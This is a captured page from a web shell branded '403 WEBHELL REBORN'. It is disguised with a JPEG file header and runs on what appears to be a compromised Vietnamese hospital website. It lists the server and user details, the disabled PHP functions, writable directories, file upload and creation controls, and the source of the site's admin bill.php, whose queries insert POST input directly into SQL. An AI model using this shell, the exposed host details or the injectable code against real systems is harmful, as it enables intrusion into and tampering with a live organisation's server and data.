ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/adminvn/bill.php
<?php
/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true) {
    if($_GET['type'] == 'my'){
        if($_POST['action'] == 1 && $_POST['id']){
            $total = count($_POST['id']);
            for($i=0; $i<$total; $i++) {
                @mysql_query("DELETE FROM cily_bills WHERE bill_user = ".$_SESSION['user']['id']." and id = ".$_POST['id'][$i]);
            }
            header('Location: index.php?m=14');
        }
        else header('Location: index.php?m=14');
    }
    elseif($_GET['type'] == 'upqty'){
    $idm = $_POST["total"];
    $pid = $_POST["pid"];
    $pub_id = $_POST["pub_id"];
    $lap=count($idm);
    $descrip = '';

    for($i=0; $i<$lap; $i++) {
        if($descrip == '') $descrip = $pub_id[$i].':'.$idm[$i];
        else $descrip .= ','.$pub_id[$i].':'.$idm[$i];   
    } 


      @mysql_query("UPDATE cily_bills SET bill_info = '".$descrip."' WHERE id = ".$_POST['bill_id']);
        Redirect("","index.php?m=4&sm=2&id=".$_POST['bill_id']."");
    }
    elseif(check_level() >= 3) {
        if($_POST['action'] == 1 && $_POST['id']){
            $total = count($_POST['id']);
            for($i=0; $i<$total; $i++) {
                @mysql_query("DELETE FROM cily_bills WHERE id = ".$_POST['id'][$i]);
            }
            header('Location: index.php?m=4');
        }
        elseif($_POST['action'] == 2 && $_POST['id']){

            $total = count($_POST['id']);
            for($i=0; $i<$total; $i++) {
                @mysql_query("UPDATE cily_bills SET bill_pay = 1, bill_date = ".time()." WHERE id = ".$_POST['id'][$i]);
                $bill = @mysql_fetch_array(@mysql_query("SELECT * FROM cily_bills WHERE id = ".$_POST['id'][$i]));
                $data = explode(',',$bill['bill_info']);
                foreach($data as $item){
                    $item = explode(':',$item);
                    $product = @mysql_fetch_array(@mysql_query("SELECT * FROM cily_products WHERE id = ".$item[0]));
                    
                    if($item[1] <= $product['product_total']) {
                        @mysql_query("UPDATE cily_products SET product_total = (product_total - ".$item[1].") WHERE id = ".$item[0]);
                    }
                    else {@mysql_query("UPDATE cily_products SET product_total = 0 WHERE id = ".$item[0]);
                    Redirect("1 số sản phẩm trong kho hết hàng, vui lòng nhập tồn kho","index.php?m=4");}

                }
            }
            header('Location: index.php?m=4');
        }
        else header('Location: index.php?m=4');
    }
    
    else echo "Hacking attempt";
}

else echo "Hacking attempt";


?>

Anon7 - 2021